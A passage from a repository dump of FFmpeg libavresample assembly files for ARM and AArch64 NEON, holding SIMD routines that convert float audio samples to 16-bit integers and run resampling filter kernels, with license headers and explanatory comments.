ld1 {\d1\().4s}, [\addr], #16
.endm
.macro LOAD8 d1, d2, d3, d4, addr
ld1 {\d1\().4s,\d2\().4s}, [\addr], #32
.endm
.macro M_MLA d1, r0, r1, d2:vararg
smlal \d1\().2d, \r0\().2s, \r1\().2s
.ifnb \d2
smlal2 \d2\().2d, \r0\().4s, \r1\().4s
.endif
.endm
.macro M_MUL d1, r0, r1, d2:vararg
smull \d1\().2d, \r0\().2s, \r1\().2s
.ifnb \d2
smull2 \d2\().2d, \r0\().4s, \r1\().4s
.endif
.endm
// combine accumulators, horizontal s64 sum, round/saturate back to s32
// dropping the 30 fraction bits of the Q30 filter products
.macro STORE_ONE rn, addr, idx, d2
add v\rn\().2d, v\rn\().2d, \d2\().2d
addp d\rn\(), v\rn\().2d
sqrshrn v\rn\().2s, v\rn\().2d, #30
str s\rn\(), [\addr, \idx, lsl #2]
.endm
resample_one s32
|
Akagi201/ffmpeg-xcode
| 14,779
|
ffmpeg-3.0.2/libavresample/aarch64/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2014 Janne Grunau <janne-libav@jannau.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/aarch64/asm.S"
// void ff_conv_flt_to_s16_neon(int16_t *dst /*x0*/, const float *src /*x1*/,
//                              int len /*x2*/)
// Converts float samples to s16: fcvtzs #31 scales by 2^31 into Q31
// fixed point, sqrshrn #16 then rounds, saturates and narrows to s16.
// NOTE(review): the first 8 samples are loaded before the count check,
// so len is assumed to be a non-zero multiple of 8.
function ff_conv_flt_to_s16_neon, export=1
subs x2, x2, #8 // len -= 8 (first 8 already in flight)
ld1 {v0.4s}, [x1], #16
fcvtzs v4.4s, v0.4s, #31 // float -> Q31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
b.eq 3f // exactly 8 samples in total
ands x12, x2, #~15 // whole 16-sample batches remaining
b.eq 2f // none: only 8 more samples remain
1: subs x12, x12, #16 // main loop: 16 samples per iteration
sqrshrn v4.4h, v4.4s, #16 // Q31 -> s16 (round + saturate)
ld1 {v2.4s}, [x1], #16
fcvtzs v6.4s, v2.4s, #31
sqrshrn2 v4.8h, v5.4s, #16
ld1 {v3.4s}, [x1], #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
ld1 {v0.4s}, [x1], #16 // prefetch next 8 for the following pass
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x1], #16
fcvtzs v5.4s, v1.4s, #31
st1 {v6.8h}, [x0], #16
b.ne 1b
ands x2, x2, #15 // 8 leftover samples?
b.eq 3f
2: ld1 {v2.4s}, [x1], #16 // tail: 8 in flight + 8 loaded here
sqrshrn v4.4h, v4.4s, #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x1], #16
sqrshrn2 v4.8h, v5.4s, #16
fcvtzs v7.4s, v3.4s, #31
sqrshrn v6.4h, v6.4s, #16
st1 {v4.8h}, [x0], #16
sqrshrn2 v6.8h, v7.4s, #16
st1 {v6.8h}, [x0]
ret
3: sqrshrn v4.4h, v4.4s, #16 // flush the final 8 samples
sqrshrn2 v4.8h, v5.4s, #16
st1 {v4.8h}, [x0]
ret
endfunc
// void ff_conv_fltp_to_s16_2ch_neon(int16_t *dst /*x0*/, float **src /*x1*/,
//                                   int len /*x2*/, int channels)
// Interleaves two planar float channels into one s16 stream.  Each
// channel is converted to Q31 (fcvtzs #31); "sri ch1, ch0, #16" then
// packs ch0's s16 value into the low half and keeps ch1's s16 value in
// the high half of every 32-bit lane, producing little-endian L/R
// pairs.  Conversion truncates (no rounding, unlike the mono path).
// NOTE(review): len assumed to be a non-zero multiple of 8.
function ff_conv_fltp_to_s16_2ch_neon, export=1
ldp x4, x5, [x1] // x4 = src[0] (left), x5 = src[1] (right)
subs x2, x2, #8 // len -= 8 (first 8 frames in flight)
ld1 {v0.4s}, [x4], #16
fcvtzs v4.4s, v0.4s, #31 // left -> Q31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31 // right -> Q31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
b.eq 3f // exactly 8 frames in total
ands x12, x2, #~15 // whole 16-frame batches remaining
b.eq 2f
1: subs x12, x12, #16 // main loop: 16 frames per iteration
ld1 {v16.4s}, [x4], #16
fcvtzs v20.4s, v16.4s, #31
sri v6.4s, v4.4s, #16 // pack L into low half of R lanes
ld1 {v17.4s}, [x4], #16
fcvtzs v21.4s, v17.4s, #31
ld1 {v18.4s}, [x5], #16
fcvtzs v22.4s, v18.4s, #31
ld1 {v19.4s}, [x5], #16
sri v7.4s, v5.4s, #16
st1 {v6.4s}, [x0], #16 // store interleaved L/R pairs
fcvtzs v23.4s, v19.4s, #31
st1 {v7.4s}, [x0], #16
sri v22.4s, v20.4s, #16
ld1 {v0.4s}, [x4], #16
sri v23.4s, v21.4s, #16
st1 {v22.4s}, [x0], #16
fcvtzs v4.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v5.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v6.4s, v2.4s, #31
ld1 {v3.4s}, [x5], #16
fcvtzs v7.4s, v3.4s, #31
st1 {v23.4s}, [x0], #16
b.ne 1b
ands x2, x2, #15 // 8 leftover frames?
b.eq 3f
2: sri v6.4s, v4.4s, #16 // tail: 8 in flight + 8 loaded here
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
ld1 {v2.4s}, [x5], #16
fcvtzs v2.4s, v2.4s, #31
sri v7.4s, v5.4s, #16
ld1 {v3.4s}, [x5], #16
fcvtzs v3.4s, v3.4s, #31
sri v2.4s, v0.4s, #16
st1 {v6.4s,v7.4s}, [x0], #32
sri v3.4s, v1.4s, #16
st1 {v2.4s,v3.4s}, [x0], #32
ret
3: sri v6.4s, v4.4s, #16 // flush the final 8 frames
sri v7.4s, v5.4s, #16
st1 {v6.4s,v7.4s}, [x0]
ret
endfunc
function ff_conv_fltp_to_s16_neon, export=1
cmp w3, #2
b.eq X(ff_conv_fltp_to_s16_2ch_neon)
b.gt 1f
ldr x1, [x1]
b X(ff_conv_flt_to_s16_neon)
1:
cmp w3, #4
lsl x12, x3, #1
b.lt 4f
5: // 4 channels
ldp x4, x5, [x1], #16
ldp x6, x7, [x1], #16
mov w9, w2
mov x8, x0
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #8
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
sri v5.4s, v4.4s, #16
ld1 {v1.4s}, [x5], #16
fcvtzs v1.4s, v1.4s, #31
sri v7.4s, v6.4s, #16
ld1 {v2.4s}, [x6], #16
fcvtzs v2.4s, v2.4s, #31
zip1 v16.4s, v5.4s, v7.4s
ld1 {v3.4s}, [x7], #16
fcvtzs v3.4s, v3.4s, #31
zip2 v17.4s, v5.4s, v7.4s
st1 {v16.d}[0], [x8], x12
sri v1.4s, v0.4s, #16
st1 {v16.d}[1], [x8], x12
sri v3.4s, v2.4s, #16
st1 {v17.d}[0], [x8], x12
zip1 v18.4s, v1.4s, v3.4s
st1 {v17.d}[1], [x8], x12
zip2 v19.4s, v1.4s, v3.4s
b.eq 7f
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
st1 {v18.d}[0], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v18.d}[1], [x8], x12
ld1 {v6.4s}, [x6], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v19.d}[0], [x8], x12
ld1 {v7.4s}, [x7], #16
fcvtzs v7.4s, v7.4s, #31
st1 {v19.d}[1], [x8], x12
b 6b
7:
st1 {v18.d}[0], [x8], x12
st1 {v18.d}[1], [x8], x12
st1 {v19.d}[0], [x8], x12
st1 {v19.d}[1], [x8], x12
subs w3, w3, #4
b.eq end
cmp w3, #4
add x0, x0, #8
b.ge 5b
4: // 2 channels
cmp w3, #2
b.lt 4f
ldp x4, x5, [x1], #16
mov w9, w2
mov x8, x0
tst w9, #8
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
b.eq 6f
subs w9, w9, #8
b.eq 7f
sri v5.4s, v4.4s, #16
ld1 {v4.4s}, [x4], #16
fcvtzs v4.4s, v4.4s, #31
st1 {v5.s}[0], [x8], x12
sri v7.4s, v6.4s, #16
st1 {v5.s}[1], [x8], x12
ld1 {v6.4s}, [x4], #16
fcvtzs v6.4s, v6.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
fcvtzs v5.4s, v5.4s, #31
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
ld1 {v7.4s}, [x5], #16
fcvtzs v7.4s, v7.4s, #31
6:
subs w9, w9, #16
ld1 {v0.4s}, [x4], #16
sri v5.4s, v4.4s, #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x5], #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12
st1 {v5.s}[1], [x8], x12
fcvtzs v1.4s, v1.4s, #31
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
ld1 {v2.4s}, [x4], #16
st1 {v7.s}[0], [x8], x12
fcvtzs v2.4s, v2.4s, #31
st1 {v7.s}[1], [x8], x12
ld1 {v3.4s}, [x5], #16
st1 {v7.s}[2], [x8], x12
fcvtzs v3.4s, v3.4s, #31
st1 {v7.s}[3], [x8], x12
sri v1.4s, v0.4s, #16
sri v3.4s, v2.4s, #16
b.eq 6f
ld1 {v4.4s}, [x4], #16
st1 {v1.s}[0], [x8], x12
fcvtzs v4.4s, v4.4s, #31
st1 {v1.s}[1], [x8], x12
ld1 {v5.4s}, [x5], #16
st1 {v1.s}[2], [x8], x12
fcvtzs v5.4s, v5.4s, #31
st1 {v1.s}[3], [x8], x12
ld1 {v6.4s}, [x4], #16
st1 {v3.s}[0], [x8], x12
fcvtzs v6.4s, v6.4s, #31
st1 {v3.s}[1], [x8], x12
ld1 {v7.4s}, [x5], #16
st1 {v3.s}[2], [x8], x12
fcvtzs v7.4s, v7.4s, #31
st1 {v3.s}[3], [x8], x12
b.gt 6b
6:
st1 {v1.s}[0], [x8], x12
st1 {v1.s}[1], [x8], x12
st1 {v1.s}[2], [x8], x12
st1 {v1.s}[3], [x8], x12
st1 {v3.s}[0], [x8], x12
st1 {v3.s}[1], [x8], x12
st1 {v3.s}[2], [x8], x12
st1 {v3.s}[3], [x8], x12
b 8f
7:
sri v5.4s, v4.4s, #16
sri v7.4s, v6.4s, #16
st1 {v5.s}[0], [x8], x12
st1 {v5.s}[1], [x8], x12
st1 {v5.s}[2], [x8], x12
st1 {v5.s}[3], [x8], x12
st1 {v7.s}[0], [x8], x12
st1 {v7.s}[1], [x8], x12
st1 {v7.s}[2], [x8], x12
st1 {v7.s}[3], [x8], x12
8:
subs w3, w3, #2
add x0, x0, #4
b.eq end
4: // 1 channel
ldr x4, [x1]
tst w2, #8
mov w9, w2
mov x5, x0
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b.ne 8f
6:
subs w9, w9, #16
ld1 {v2.4s}, [x4], #16
fcvtzs v2.4s, v2.4s, #31
ld1 {v3.4s}, [x4], #16
fcvtzs v3.4s, v3.4s, #31
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq 7f
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
7:
st1 {v2.h}[1], [x5], x12
st1 {v2.h}[3], [x5], x12
st1 {v2.h}[5], [x5], x12
st1 {v2.h}[7], [x5], x12
st1 {v3.h}[1], [x5], x12
st1 {v3.h}[3], [x5], x12
st1 {v3.h}[5], [x5], x12
st1 {v3.h}[7], [x5], x12
b.gt 6b
ret
8:
subs w9, w9, #8
st1 {v0.h}[1], [x5], x12
st1 {v0.h}[3], [x5], x12
st1 {v0.h}[5], [x5], x12
st1 {v0.h}[7], [x5], x12
st1 {v1.h}[1], [x5], x12
st1 {v1.h}[3], [x5], x12
st1 {v1.h}[5], [x5], x12
st1 {v1.h}[7], [x5], x12
b.eq end
ld1 {v0.4s}, [x4], #16
fcvtzs v0.4s, v0.4s, #31
ld1 {v1.4s}, [x4], #16
fcvtzs v1.4s, v1.4s, #31
b 6b
end:
ret
endfunc
|
Akagi201/ffmpeg-xcode
| 9,173
|
ffmpeg-3.0.2/libavresample/arm/resample_neon.S
|
/*
* Copyright (c) 2014 Peter Meerwald <pmeerw@pmeerw.net>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "asm-offsets.h"
.macro resample_one fmt, es=2
function ff_resample_one_\fmt\()_neon, export=1
push {r4, r5}
add r1, r1, r2, lsl #\es
ldr r2, [r0, #PHASE_SHIFT+4] /* phase_mask */
ldr ip, [sp, #8] /* index */
ldr r5, [r0, #FILTER_LENGTH]
and r2, ip, r2 /* (index & phase_mask) */
ldr r4, [r0, #PHASE_SHIFT]
lsr r4, ip, r4 /* compute sample_index */
mul r2, r2, r5
ldr ip, [r0, #FILTER_BANK]
add r3, r3, r4, lsl #\es /* &src[sample_index] */
cmp r5, #8
add r0, ip, r2, lsl #\es /* filter = &filter_bank[...] */
blt 5f
8:
subs r5, r5, #8
LOAD4
MUL4
7:
LOAD4
beq 6f
cmp r5, #8
MLA4
blt 4f
subs r5, r5, #8
LOAD4
MLA4
b 7b
6:
MLA4
STORE
pop {r4, r5}
bx lr
5:
INIT4
4: /* remaining filter_length 1 to 7 */
cmp r5, #4
blt 2f
subs r5, r5, #4
LOAD4
MLA4
beq 0f
2: /* remaining filter_length 1 to 3 */
cmp r5, #2
blt 1f
subs r5, r5, #2
LOAD2
MLA2
beq 0f
1: /* remaining filter_length 1 */
LOAD1
MLA1
0:
STORE
pop {r4, r5}
bx lr
endfunc
.purgem LOAD1
.purgem LOAD2
.purgem LOAD4
.purgem MLA1
.purgem MLA2
.purgem MLA4
.purgem MUL4
.purgem INIT4
.purgem STORE
.endm
/* float32 */
.macro LOAD1
veor.32 d0, d0
vld1.32 {d0[0]}, [r0]! /* load filter */
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
vld1.32 {d0}, [r0]! /* load filter */
vld1.32 {d4}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.32 {d0,d1}, [r0]! /* load filter */
vld1.32 {d4,d5}, [r3]! /* load src */
.endm
.macro MLA1
vmla.f32 d16, d0, d4[0]
.endm
.macro MLA2
vmla.f32 d16, d0, d4
.endm
.macro MLA4
vmla.f32 d16, d0, d4
vmla.f32 d17, d1, d5
.endm
.macro MUL4
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d5
.endm
.macro INIT4
veor.f32 q8, q8
.endm
.macro STORE
vpadd.f32 d16, d16, d17
vpadd.f32 d16, d16, d16
vst1.32 d16[0], [r1]
.endm
resample_one flt, 2
/* s32 */
.macro LOAD1
veor.32 d0, d0
vld1.32 {d0[0]}, [r0]! /* load filter */
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
vld1.32 {d0}, [r0]! /* load filter */
vld1.32 {d4}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.32 {d0,d1}, [r0]! /* load filter */
vld1.32 {d4,d5}, [r3]! /* load src */
.endm
.macro MLA1
vmlal.s32 q8, d0, d4[0]
.endm
.macro MLA2
vmlal.s32 q8, d0, d4
.endm
.macro MLA4
vmlal.s32 q8, d0, d4
vmlal.s32 q9, d1, d5
.endm
.macro MUL4
vmull.s32 q8, d0, d4
vmull.s32 q9, d1, d5
.endm
.macro INIT4
veor.s64 q8, q8
veor.s64 q9, q9
.endm
.macro STORE
vadd.s64 q8, q8, q9
vadd.s64 d16, d16, d17
vqrshrn.s64 d16, q8, #30
vst1.32 d16[0], [r1]
.endm
resample_one s32, 2
/* s16 */
.macro LOAD1
veor.16 d0, d0
vld1.16 {d0[0]}, [r0]! /* load filter */
vld1.16 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
veor.16 d0, d0
vld1.32 {d0[0]}, [r0]! /* load filter */
veor.16 d4, d4
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.16 {d0}, [r0]! /* load filter */
vld1.16 {d4}, [r3]! /* load src */
.endm
.macro MLA1
vmlal.s16 q8, d0, d4[0]
.endm
.macro MLA2
vmlal.s16 q8, d0, d4
.endm
.macro MLA4
vmlal.s16 q8, d0, d4
.endm
.macro MUL4
vmull.s16 q8, d0, d4
.endm
.macro INIT4
veor.s32 q8, q8
.endm
.macro STORE
vpadd.s32 d16, d16, d17
vpadd.s32 d16, d16, d16
vqrshrn.s32 d16, q8, #15
vst1.16 d16[0], [r1]
.endm
resample_one s16, 1
.macro resample_linear fmt, es=2
function ff_resample_linear_\fmt\()_neon, export=1
push {r4, r5}
add r1, r1, r2, lsl #\es
ldr r2, [r0, #PHASE_SHIFT+4] /* phase_mask */
ldr ip, [sp, #8] /* index */
ldr r5, [r0, #FILTER_LENGTH]
and r2, ip, r2 /* (index & phase_mask) */
ldr r4, [r0, #PHASE_SHIFT]
lsr r4, ip, r4 /* compute sample_index */
mul r2, r2, r5
ldr ip, [r0, #FILTER_BANK]
add r3, r3, r4, lsl #\es /* &src[sample_index] */
cmp r5, #8
ldr r4, [r0, #SRC_INCR]
add r0, ip, r2, lsl #\es /* filter = &filter_bank[...] */
add r2, r0, r5, lsl #\es /* filter[... + c->filter_length] */
blt 5f
8:
subs r5, r5, #8
LOAD4
MUL4
7:
LOAD4
beq 6f
cmp r5, #8
MLA4
blt 4f
subs r5, r5, #8
LOAD4
MLA4
b 7b
6:
MLA4
STORE
pop {r4, r5}
bx lr
5:
INIT4
4: /* remaining filter_length 1 to 7 */
cmp r5, #4
blt 2f
subs r5, r5, #4
LOAD4
MLA4
beq 0f
2: /* remaining filter_length 1 to 3 */
cmp r5, #2
blt 1f
subs r5, r5, #2
LOAD2
MLA2
beq 0f
1: /* remaining filter_length 1 */
LOAD1
MLA1
0:
STORE
pop {r4, r5}
bx lr
endfunc
.purgem LOAD1
.purgem LOAD2
.purgem LOAD4
.purgem MLA1
.purgem MLA2
.purgem MLA4
.purgem MUL4
.purgem INIT4
.purgem STORE
.endm
/* float32 linear */
.macro LOAD1
veor.32 d0, d0
veor.32 d2, d2
vld1.32 {d0[0]}, [r0]! /* load filter */
vld1.32 {d2[0]}, [r2]! /* load filter */
vld1.32 {d4[0]}, [r3]! /* load src */
.endm
.macro LOAD2
vld1.32 {d0}, [r0]! /* load filter */
vld1.32 {d2}, [r2]! /* load filter */
vld1.32 {d4}, [r3]! /* load src */
.endm
.macro LOAD4
vld1.32 {d0,d1}, [r0]! /* load filter */
vld1.32 {d2,d3}, [r2]! /* load filter */
vld1.32 {d4,d5}, [r3]! /* load src */
.endm
.macro MLA1
vmla.f32 d18, d0, d4[0]
vmla.f32 d16, d2, d4[0]
.endm
.macro MLA2
vmla.f32 d18, d0, d4
vmla.f32 d16, d2, d4
.endm
.macro MLA4
vmla.f32 q9, q0, q2
vmla.f32 q8, q1, q2
.endm
.macro MUL4
vmul.f32 q9, q0, q2
vmul.f32 q8, q1, q2
.endm
.macro INIT4
veor.f32 q9, q9
veor.f32 q8, q8
.endm
.macro STORE
vldr s0, [sp, #12] /* frac */
vmov s1, r4
vcvt.f32.s32 d0, d0
vsub.f32 q8, q8, q9 /* v2 - val */
vpadd.f32 d18, d18, d19
vpadd.f32 d16, d16, d17
vpadd.f32 d2, d18, d18
vpadd.f32 d1, d16, d16
vmul.f32 s2, s2, s0 /* (v2 - val) * frac */
vdiv.f32 s2, s2, s1 /* / c->src_incr */
vadd.f32 s4, s4, s2
vstr s4, [r1]
.endm
resample_linear flt, 2
|
Akagi201/ffmpeg-xcode
| 14,088
|
ffmpeg-3.0.2/libavresample/arm/audio_convert_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "libavutil/arm/asm.S"
@ void ff_conv_flt_to_s16_neon(int16_t *dst (r0), const float *src (r1),
@                              int len (r2))
@ Converts float samples to s16: vcvt #31 scales by 2^31 into Q31 fixed
@ point, vqrshrn #16 then rounds, saturates and narrows to s16.  The
@ :128 qualifiers require both pointers to be 16-byte aligned.
@ NOTE(review): the first 8 samples are loaded before the count check,
@ so len is assumed to be a non-zero multiple of 8.
function ff_conv_flt_to_s16_neon, export=1
subs r2, r2, #8 @ len -= 8 (first 8 already in flight)
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q8, q0, #31 @ float -> Q31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
beq 3f @ exactly 8 samples in total
bics r12, r2, #15 @ whole 16-sample batches remaining
beq 2f @ none: only 8 more samples remain
1: subs r12, r12, #16 @ main loop: 16 samples per iteration
vqrshrn.s32 d4, q8, #16 @ Q31 -> s16 (round + saturate)
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vqrshrn.s32 d5, q9, #16
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vld1.32 {q8}, [r1,:128]! @ prefetch next 8 for the following pass
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vst1.16 {q3}, [r0,:128]!
bne 1b
ands r2, r2, #15 @ 8 leftover samples?
beq 3f
2: vld1.32 {q0}, [r1,:128]! @ tail: 8 in flight + 8 loaded here
vqrshrn.s32 d4, q8, #16
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vqrshrn.s32 d5, q9, #16
vcvt.s32.f32 q1, q1, #31
vqrshrn.s32 d6, q0, #16
vst1.16 {q2}, [r0,:128]!
vqrshrn.s32 d7, q1, #16
vst1.16 {q3}, [r0,:128]!
bx lr
3: vqrshrn.s32 d4, q8, #16 @ flush the final 8 samples
vqrshrn.s32 d5, q9, #16
vst1.16 {q2}, [r0,:128]!
bx lr
endfunc
@ void ff_conv_fltp_to_s16_2ch_neon(int16_t *dst (r0), float **src (r1),
@                                   int len (r2), int channels)
@ Interleaves two planar float channels into one s16 stream.  Each
@ channel is converted to Q31 (vcvt #31); "vsri ch1, ch0, #16" then
@ packs ch0's s16 value into the low half and keeps ch1's s16 value in
@ the high half of every 32-bit lane, producing little-endian L/R
@ pairs.  Conversion truncates (no rounding, unlike the mono path).
@ NOTE(review): len assumed to be a non-zero multiple of 8.
function ff_conv_fltp_to_s16_2ch_neon, export=1
ldm r1, {r1, r3} @ r1 = src[0] (left), r3 = src[1] (right)
subs r2, r2, #8 @ len -= 8 (first 8 frames in flight)
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q8, q0, #31 @ left -> Q31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q9, q1, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31 @ right -> Q31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
beq 3f @ exactly 8 frames in total
bics r12, r2, #15 @ whole 16-frame batches remaining
beq 2f
1: subs r12, r12, #16 @ main loop: 16 frames per iteration
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q10, q8, #16 @ pack L into low half of R lanes
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vld1.32 {q13}, [r3,:128]!
vsri.32 q11, q9, #16
vst1.16 {q10}, [r0,:128]! @ store interleaved L/R pairs
vcvt.s32.f32 q13, q13, #31
vst1.16 {q11}, [r0,:128]!
vsri.32 q12, q0, #16
vld1.32 {q8}, [r1,:128]!
vsri.32 q13, q1, #16
vst1.16 {q12}, [r0,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r1,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r3,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r3,:128]!
vcvt.s32.f32 q11, q11, #31
vst1.16 {q13}, [r0,:128]!
bne 1b
ands r2, r2, #15 @ 8 leftover frames?
beq 3f
2: vsri.32 q10, q8, #16 @ tail: 8 in flight + 8 loaded here
vld1.32 {q0}, [r1,:128]!
vcvt.s32.f32 q0, q0, #31
vld1.32 {q1}, [r1,:128]!
vcvt.s32.f32 q1, q1, #31
vld1.32 {q12}, [r3,:128]!
vcvt.s32.f32 q12, q12, #31
vsri.32 q11, q9, #16
vld1.32 {q13}, [r3,:128]!
vcvt.s32.f32 q13, q13, #31
vst1.16 {q10}, [r0,:128]!
vsri.32 q12, q0, #16
vst1.16 {q11}, [r0,:128]!
vsri.32 q13, q1, #16
vst1.16 {q12-q13},[r0,:128]!
bx lr
3: vsri.32 q10, q8, #16 @ flush the final 8 frames
vsri.32 q11, q9, #16
vst1.16 {q10-q11},[r0,:128]!
bx lr
endfunc
function ff_conv_fltp_to_s16_neon, export=1
cmp r3, #2
itt lt
ldrlt r1, [r1]
blt X(ff_conv_flt_to_s16_neon)
beq X(ff_conv_fltp_to_s16_2ch_neon)
push {r4-r8, lr}
cmp r3, #4
lsl r12, r3, #1
blt 4f
@ 4 channels
5: ldm r1!, {r4-r7}
mov lr, r2
mov r8, r0
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
vld1.32 {q10}, [r6,:128]!
vcvt.s32.f32 q10, q10, #31
vld1.32 {q11}, [r7,:128]!
vcvt.s32.f32 q11, q11, #31
6: subs lr, lr, #8
vld1.32 {q0}, [r4,:128]!
vcvt.s32.f32 q0, q0, #31
vsri.32 q9, q8, #16
vld1.32 {q1}, [r5,:128]!
vcvt.s32.f32 q1, q1, #31
vsri.32 q11, q10, #16
vld1.32 {q2}, [r6,:128]!
vcvt.s32.f32 q2, q2, #31
vzip.32 d18, d22
vld1.32 {q3}, [r7,:128]!
vcvt.s32.f32 q3, q3, #31
vzip.32 d19, d23
vst1.16 {d18}, [r8], r12
vsri.32 q1, q0, #16
vst1.16 {d22}, [r8], r12
vsri.32 q3, q2, #16
vst1.16 {d19}, [r8], r12
vzip.32 d2, d6
vst1.16 {d23}, [r8], r12
vzip.32 d3, d7
beq 7f
vld1.32 {q8}, [r4,:128]!
vcvt.s32.f32 q8, q8, #31
vst1.16 {d2}, [r8], r12
vld1.32 {q9}, [r5,:128]!
vcvt.s32.f32 q9, q9, #31
